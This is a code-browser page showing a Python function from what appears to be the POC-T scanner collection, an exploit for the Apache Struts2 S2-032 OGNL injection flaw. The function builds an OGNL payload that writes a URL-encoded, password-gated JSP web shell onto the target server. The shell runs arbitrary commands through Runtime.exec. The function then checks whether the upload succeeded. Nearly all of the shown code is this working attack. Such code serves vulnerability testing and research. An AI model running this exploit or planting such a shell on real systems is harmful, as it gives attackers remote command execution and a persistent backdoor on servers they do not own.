MCPcopy
hub / github.com/Xyntax/POC-T / poc

Function poc

script/struts2-s2032.py:19–56  ·  view source on GitHub ↗
(url)

Source from the content-addressed store, hash-verified

17
18
19def poc(url):
20 try:
21 if '://' not in url:
22 url = 'http://' + url
23 url = url.split('?')[0]
24 jsp_file = str(random.randint(1000, 1000000)) + '.jsp'
25 content = 'gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.' \
26 'getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%2' \
27 '0%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%' \
28 '29.exec%28request.getParameter%28%22l%22%29%29.getInputStre' \
29 'am%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B' \
30 '%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byt' \
31 'e%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3C' \
32 'pre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din' \
33 '.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20' \
34 '%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%2' \
35 '0%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%' \
36 '22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E'
37
38 poc_url = "{url}?method:%23_memberAccess%3d@ognl.OgnlContext" \
39 "@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0]," \
40 "%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a)," \
41 "%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23" \
42 "fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23para" \
43 "meters.content[0].getBytes()),%23fos.close(),%23hh%3d%23conte" \
44 "xt.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23" \
45 "b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23x" \
46 "x:%23request.toString&reqobj=com.opensymphony.xwork2.dispatch" \
47 "er.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatch" \
48 "er.HttpServletResponse&reqobj=%2f&reqobj={filename}&content={" \
49 "content}".format(url=url, filename=jsp_file, content=content)
50
51 s = requests.get(poc_url,
52 headers={'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0'},
53 timeout=10)
54 return bool(s.status_code == 200 and jsp_file in s.content and 'method:' not in s.content)
55 except Exception:
56 return False

Callers

nothing calls this directly

Calls 3

splitMethod · 0.80
formatMethod · 0.80
getMethod · 0.80

Tested by

no test coverage detected